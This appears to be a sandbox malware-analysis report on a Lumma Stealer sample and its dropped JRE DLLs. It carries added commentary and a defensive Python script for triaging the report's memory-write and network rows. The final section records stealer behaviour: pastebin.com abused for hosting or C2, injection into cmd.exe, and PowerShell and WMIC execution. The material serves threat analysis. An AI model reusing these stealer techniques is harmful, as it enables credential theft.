rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

N/A
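
This detonation, like behavioral22, behavioral27, behavioral11 and behavioral13 further down, is the sandbox running one of the dropped JRE DLLs through `rundll32.exe ...,#1`. Two things in it are easy to over-read. First, "Suspicious use of WriteProcessMemory" here is the 64-bit `C:\Windows\system32\rundll32.exe` writing into the `C:\Windows\SysWOW64\rundll32.exe` child it spawned with the identical command line: when 64-bit rundll32 is handed a 32-bit DLL it re-launches its SysWOW64 counterpart, and the parent's writes into that child are ordinary process set-up, not injection into a foreign process. Second, every Network row is a reverse-DNS (`in-addr.arpa`) lookup of sandbox background traffic, so no domain of the sample's choosing was contacted. The Python below is an added example, not code from the report or from the sandbox: it classifies the WriteProcessMemory rows (collapsing the repeated identical lines) and splits Network rows into reverse-DNS noise, forward lookups and contacted endpoints, handling the row with no domain column. Sample rows are copied from this section and from behavioral6; the row marked CONSTRUCTED is a hypothetical counter-example, and the classification rules are this example's own.

```python
"""Triage 'Suspicious use of WriteProcessMemory' and 'Network' rows from the
rundll32 detonations in this report.

Added example; not code from the report or from the sandbox that produced it.
Rule (assumption of this example): rundll32.exe under system32 writing into
rundll32.exe under SysWOW64 is the 64-bit -> 32-bit re-launch hand-off, not
injection; any other source/target pair is reported for a closer look.
"""
import re
from collections import defaultdict

WPM_RE = re.compile(
    r"^PID (?P<src_pid>\d+) wrote to memory of (?P<dst_pid>\d+) \S+ "
    r"(?P<src>\S+) (?P<dst>\S+)$"
)
# Country, Destination, optional Domain, Proto (the mDNS row has no domain).
NET_RE = re.compile(
    r"^(?P<cc>\S+) (?P<dst>\S+:\d+) (?:(?P<domain>\S+) )?(?P<proto>tcp|udp)$"
)


def classify_wpm(row: str) -> str:
    """'wow64_relaunch' for the rundll32 system32 -> SysWOW64 hand-off,
    'cross_process_write' for anything else."""
    m = WPM_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised WriteProcessMemory row: {row!r}")
    src, dst = m["src"].lower(), m["dst"].lower()
    if (src.endswith("\\system32\\rundll32.exe")
            and dst.endswith("\\syswow64\\rundll32.exe")):
        return "wow64_relaunch"
    return "cross_process_write"


def summarise_wpm(rows):
    """Collapse the repeated identical rows the sandbox emits, then count."""
    counts = defaultdict(int)
    for row in dict.fromkeys(r.strip() for r in rows if r.strip()):
        counts[classify_wpm(row)] += 1
    return dict(counts)


def triage_network(rows):
    """Separate reverse-DNS noise from forward lookups and contacted endpoints."""
    result = {"ptr_lookups": 0, "forward_lookups": set(),
              "endpoints": defaultdict(set), "unparsed": []}
    for row in rows:
        row = row.strip()
        if not row:
            continue
        m = NET_RE.match(row)
        if not m:
            result["unparsed"].append(row)
            continue
        domain, dst, proto = m["domain"], m["dst"], m["proto"]
        if proto == "udp" and dst.endswith(":53") and domain:
            if domain.endswith(".in-addr.arpa"):
                result["ptr_lookups"] += 1      # background reverse lookups
            else:
                result["forward_lookups"].add(domain)
        else:
            result["endpoints"][domain or "(no name)"].add(dst)
    result["endpoints"] = dict(result["endpoints"])
    return result


# Copied from the behavioral16 section; last row is CONSTRUCTED (hypothetical).
WPM_ROWS = [
    r"PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe",
    r"PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe",
    r"PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe",
    r"PID 4092 wrote to memory of 2500 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\explorer.exe",
]

# First three rows from behavioral16; the rest from behavioral6 (Edge opening
# Welcome.html), chosen to exercise the forward-lookup and no-domain cases.
NET_ROWS = [
    "US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp",
    "US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp",
    "US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp",
    "US 8.8.8.8:53 api.edgeoffer.microsoft.com udp",
    "IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp",
    "N/A 224.0.0.251:5353 udp",
    "GB 92.123.128.149:443 www.bing.com udp",
]

if __name__ == "__main__":
    print(summarise_wpm(WPM_ROWS))
    print(triage_network(NET_ROWS))
```

Run over this section the summary is `{"wow64_relaunch": 1}` and three PTR lookups with nothing else, which is the right reading of the detonation: the DLL was exercised, the language-key read is the loader's normal locale lookup, and nothing here attributes network activity to the sample. The `cross_process_write` verdict only appears for the constructed row; in a real report it is the case to open.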

Analysis: behavioral22

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

121s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 4580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2248 wrote to memory of 4580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2248 wrote to memory of 4580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240708-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

129s

Max time network

159s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

Signatures

N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=2152,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4688,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5400,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5548,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5560 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5584,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6040,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5744,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5912 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:443 www.microsoft.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 2.19.117.71:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 137.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 71.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 92.123.128.149:443 www.bing.com udp
US 8.8.8.8:53 149.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
GB 92.123.128.149:443 www.bing.com tcp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

8s

Max time network

20s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1176 set thread context of 2420 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
